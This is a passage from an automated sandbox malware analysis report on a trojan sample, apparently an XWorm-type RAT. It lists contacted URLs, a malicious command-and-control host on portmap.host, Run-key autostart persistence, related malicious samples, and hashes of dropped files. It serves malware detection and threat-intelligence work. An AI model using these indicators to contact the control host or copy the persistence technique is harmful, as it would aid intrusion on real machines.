                                                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                                                                  		high
                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://musicimage.xboxlive.comtXBLWinClient/v10_music/configuration.xmlMusic.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://ns.adob/Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://settings-ssl.xboxlive.comPNMusic.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://musicart.xboxlive.com/9/e74d4600-0000-0000-0000-000000000002/504/image.jpgMusic.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3620480168.0000000002411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ns.adobeTyMusic.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  193.161.193.99
                                                                                  		Dyno15-41078.portmap.hostRussian Federation
                                                                                  		198134BITREE-ASRUtrue
                                                                                  92.123.20.9
                                                                                  		e87.dspb.akamaiedge.netEuropean Union
                                                                                  		16625AKAMAI-ASUSfalse

                                                                                  Private

                                                                                  IP
                                                                                  127.0.0.1

                                                                                  General Information

                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1639881
                                                                                  Start date and time:2025-03-16 13:05:56 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 8m 12s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:23
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:test2.exe.bin.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.evad.winEXE@11/27@2/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 80
                                                                                  • Number of non-executed functions: 9
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 23.199.214.10, 20.109.210.53
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target Music.UI.exe, PID 7992 because there are no executed function
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7788 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  08:06:52API Interceptor44574x Sleep call for process: Music.UI.exe modified
                                                                                  08:06:52API Interceptor29x Sleep call for process: powershell.exe modified
                                                                                  08:06:56API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                  08:06:57API Interceptor10496711x Sleep call for process: XClient.exe modified
                                                                                  08:07:11API Interceptor2x Sleep call for process: OpenWith.exe modified
                                                                                  12:07:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run test C:\Users\user\AppData\Local\Temp\test
                                                                                  12:07:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run test C:\Users\user\AppData\Local\Temp\test

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                                                                                  • okmaq-24505.portmap.host:24505/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  e87.dspb.akamaiedge.netFleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                                                                  • 95.101.148.7
                                                                                  FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                                                                  • 23.219.148.9
                                                                                  Busy2.0.exeGet hashmaliciousBabadedaBrowse
                                                                                  • 23.219.148.9
                                                                                  http://def.ball-strike-up.shop/Get hashmaliciousUnknownBrowse
                                                                                  • 23.35.228.10
                                                                                  NrFs9S2x5P.vbsGet hashmaliciousMoDiRATBrowse
                                                                                  • 2.23.244.9
                                                                                  desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                  • 95.101.148.7
                                                                                  desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                  • 95.101.148.7
                                                                                  Gadomancy.exeGet hashmaliciousUnknownBrowse
                                                                                  • 23.219.148.9
                                                                                  Gadomancy.exeGet hashmaliciousUnknownBrowse
                                                                                  • 2.23.244.9
                                                                                  VM Audio and Transcription for you on Thu, February 27, 2025 ref_bnyiIW.emlGet hashmaliciousUnknownBrowse
                                                                                  • 23.209.212.9

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  AKAMAI-ASUShgfs.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.86.148.15
                                                                                  Spoofer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 92.122.104.90
                                                                                  nvtowadkthjawdr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.73.234.102
                                                                                  LauncherV9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.73.234.102
                                                                                  launcher.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.73.234.102
                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.73.234.102
                                                                                  InstructionalPostings.exeGet hashmaliciousUnknownBrowse
                                                                                  • 23.192.247.89
                                                                                  InstructionalPostings.exeGet hashmaliciousUnknownBrowse
                                                                                  • 23.192.247.89
                                                                                  installer_ver12.22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 23.192.247.89
                                                                                  work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                  • 23.192.247.89
                                                                                  BITREE-ASRUtttt.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  SolaraExecutor.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  dd.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  Output.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  chrome.batGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  1.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                  • 193.161.193.99
                                                                                  BootstrapperNew.exe.bin.exeGet hashmaliciousQuasarBrowse
                                                                                  • 193.161.193.99
                                                                                  Steam.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                  • 193.161.193.99

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  6271f898ce5be7dd52b0fc260d0662b3FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                                                                  • 92.123.20.9
                                                                                  FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                                                                  • 92.123.20.9
                                                                                  Busy2.0.exeGet hashmaliciousBabadedaBrowse
                                                                                  • 92.123.20.9
                                                                                  MSBuild.exeGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9
                                                                                  Our Order.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9
                                                                                  Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9
                                                                                  APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9
                                                                                  Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9
                                                                                  Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9
                                                                                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 92.123.20.9

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):8192
                                                                                  Entropy (8bit):0.363788168458258
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                  MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                  SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                  SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                  SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):1.3107706297796735
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrM:KooCEYhgYEL0In
                                                                                  MD5:5BFC092ADE58B9FC0023CEC5CDC86E53
                                                                                  SHA1:1CD5EBF56E7931D6BCC62C7227F34D8EC10B5C67
                                                                                  SHA-256:F87FC6DA4A6856692946D7BA1D123B8A89D2DAA03512632985152FB2D3260781
                                                                                  SHA-512:602195BCD63B804556094257BB391F19ACC05A4A3313435C15BFC16324F4AD7888608AA93B672B0DF7C97BE85E55C7E96A8BA23DE4B892B43A586FE1B45C65AA
                                                                                  Malicious:false
                                                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb1407c14, page size 16384, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.42208322303007606
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:XSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Xazag03A2UrzJDO
                                                                                  MD5:D679ACED66DD49C99B47A76C3CBD55D3
                                                                                  SHA1:BD253B5C0DF4E85E09ADF97E89FFA869CDF6A075
                                                                                  SHA-256:DAA9C938D7B6351182F15E12109A8D4928617A62B6C969CF7B9F60EBE7BFB411
                                                                                  SHA-512:939AE1C806F4D5ED93022808325BA9E60DE8ED13ECC0F4212771C6D8B6D821423C41CCEE39D9FDC95EDA32D11E8A346AB96FC69E63E6DEEFE43E626FD0842CE9
                                                                                  Malicious:false
                                                                                  Preview:.@|.... .......Y.......X\...;...{......................n.%..........}?.9....}a.h.#..........}?.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................@......}?..................;.......}?..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):0.07327801873499173
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:IgStUetYerV1mPgbPs1ux1nuKillOE/tlnl+/rTc:IgUzrVsooe1n/GpMP
                                                                                  MD5:43E69DF7A902C672C301FFD50BF027D8
                                                                                  SHA1:48A38F6DCB80BD03E638ADD07DC11A0A2CA55261
                                                                                  SHA-256:2C1695D53EF6F957DD537FA466CC3CDF600F64602CE8CFAFAAF41A0148A75D75
                                                                                  SHA-512:DEB70BEAFF9EC200B16F4AC48C5DC9A5CDE417A947AD4B09A191AAAE08330B70889B828D4D462B626B349EB644E1D5361A963A0764048B7689F572AF00ACB8FD
                                                                                  Malicious:false
                                                                                  Preview:6.......................................;...{..9....}.......}?..............}.......}?..........}?..................;.......}?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.380192968514367
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:+LHyIFKL3IZ2KRH9OugIs
                                                                                  MD5:98778F626AC9E3DC7169E3F08354680E
                                                                                  SHA1:97269AC745F7763EBD98A290F5F7B94CBDE9B787
                                                                                  SHA-256:B87CDA0FEFD257DC12C41E03FA369FDAECDB02BB2E7A9168D07CB412B5415D25
                                                                                  SHA-512:E6CDCBC763CDDE078C9E30A6544B5B14A7709579FEBB272B93B26FFEA92AB2701DF1F61CC3377E9A486D97BDF404865AB9BFFB344DD74777BAB000D08772280F
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\INetCache\KXW3RVPU\configuration[1].xml

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):2659
                                                                                  Entropy (8bit):4.926959150875136
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cK88z2Dxfo++T4Vu5Hj2oJ//QBfM9ifr9jf2dBfUyrAf0dPfUytCfN4wc/+:n88z2DxueBQipjQB8BWP8pc+
                                                                                  MD5:69415BBB2113097CE28402C78AAB8A1D
                                                                                  SHA1:3CC52AA27D635F22434CFEAD93C27D3B5287BF2E
                                                                                  SHA-256:95458051B4940AA84E142A19F4F775901CBFADC6BDEC409FC7C9DAC854FC8910
                                                                                  SHA-512:03C62FF862F73046C45D6495D6E5E821ACBD228A230E6761DEE9E8A4E48F157CE3566E6E06FE8CACA73D4736B6AC78A4914855CDE4037574D8DBF86B2B2A0B54
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1">.. <targetedClient>XblWinClient</targetedClient > .. <rights>Copyright (c) Microsoft Corporation. All rights reserved.</rights> .... <configuration name="Features">.. <property name="EditorialPlaylistsEnabled" type="string" value="AU,CA,DE,FR,GB,MX,NZ,US" />.. <property name="ExploreWithGenreDetailsEnabled" type="string" value="AU,CA,DE,FR,GB,MX,NZ,US" />.. <property name="GenreRadioEnabled" type="string" value="AU,CA,DE,FR,GB,MX,NZ,US" />.. <property name="MusicPassUpsell" type="string" value="" />.. <property name="MusicPassUpsellForCollectionPDP" type="string" value="" />.. <property name="MusicPassUpsellInMixtapes" type="string" value="" />.. <property name="MusicPassInAppPurchase" type="string" value="" />.. <property name="MusicSubscription" type="stri

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfd891228, page size 8192, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):3670016
                                                                                  Entropy (8bit):0.2380243134713775
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:xdSh2B+KY8kWJnbcgTC0/k63bBu7fhWx7zQSh20KY8kCeyDFqf6zgTC0/k63bBu5:/6PL4DQ6rLoc
                                                                                  MD5:A0EC53E59D2E43437C69714A4C7BAFA4
                                                                                  SHA1:B6033E65841761EB7FB61EC2626AC9DB2789E644
                                                                                  SHA-256:DD402F6DCDC93BEE7682893EACFD6DCB857540B7CB18B0C43D4C5C25B981AD20
                                                                                  SHA-512:30DD70363DA79633BE9897475744C9DA6B865374B87DACF2F9CBB000DBA78A30BA19F0760986577EC1CAE84BA6E88C67C92027E523B1C9D88CEF45CDF4FA5AD0
                                                                                  Malicious:false
                                                                                  Preview:...(... .......-.........]4....}#.....................................4....}..h..............................d4....}..........................................................................................................eJ........... ...................................................................................................... .......4....}..............................................................................................................................................................................................5....}y.....................................5....}y..................:.P5....}!.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.jfm

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):0.08203213403361016
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:2YmZ5Ymjll1lYjpzvEjK2R7l/lBoiyllQjii1l8ll8l9k/wos9aolk4k1:uvZl1iZviRJUjugyvgo9
                                                                                  MD5:0BCE22344B98FF7BF1A4BDF4DDADFD45
                                                                                  SHA1:A9B3A8A262EE2910E4B30611BD557C255CA64883
                                                                                  SHA-256:8C706CC2326725A6C3420121E4BF49996F194641169E259EF749223B0F0B85EC
                                                                                  SHA-512:55D3A3F227DECB8ED553D9DA64DBC4E1CC24B86FB141CA5FE9BE5F476791DAFA79AC58943CE6658666BD99C75059CDBAA7094F0D543DE32AE1E0373E7EEEE2E5
                                                                                  Malicious:false
                                                                                  Preview:..q.....................................4....}C.4....}C.................5....}!.........-.C.5....}...................:.P5....}!.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):8192
                                                                                  Entropy (8bit):0.6191073368731885
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:0RlY+fUCx/8+fUCx/QeRlY+fUCx/8+fUCx/Q:GeiUCx0iUCxFeiUCx0iUCx
                                                                                  MD5:866D4AE698A98DA4DF5F7444D5F6D08F
                                                                                  SHA1:9F82E997FCA4AE96483436750D304B44284FD206
                                                                                  SHA-256:CA502F746361BB10CB8DA2A6252F2596F722441E46B249534A109FE348578D16
                                                                                  SHA-512:99C0C894B1645278B5867F6242EA6AACBFE69AF19D57C70E7C9EFCBAE70F7660B2FED05014CBAF52CF0DC8B63A1E8B7FE19B44624FA14200372E01CB4A62B357
                                                                                  Malicious:false
                                                                                  Preview:.SP....................d4....}..................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\...............................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\................................................................................................................................................................0u..,.....................5w.................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2097152
                                                                                  Entropy (8bit):0.7397765410586085
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:/ZV8R1dzEBmHlXDulLuE2a+ciy8zWY+r6JBiN6MAfO42j6Gs1548AZ5yeh0G32fl:/ZV8RLD7rO3bJhWO4NaaVb5
                                                                                  MD5:C4745D7ADDC86304DCF46526AF3EA4B9
                                                                                  SHA1:A303DD1E067E61D921E30B84D535BA6D36A5E1AD
                                                                                  SHA-256:BE3EA01237BBCE16CB68A99AEF0C98714D54C4EB8EC2E7B5A3A3BE05783C297E
                                                                                  SHA-512:2487AAA69ABBA387823086A9B9C1E4F9A5584941EC797080EE48A31403E058CDC18EB23300A18EF87EE74179EA01DE198B4854489FE4706AA105F41EB1E07C50
                                                                                  Malicious:false
                                                                                  Preview:D............. 4....}.........................d4....}..................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\...............................................................................................................................................................C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\................................................................................................................................................................0u..,.....................5w.......................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2097152
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                  SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                  SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                  SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2097152
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                  SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                  SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                  SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2097152
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                  SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                  SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                  SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\tmp.edb

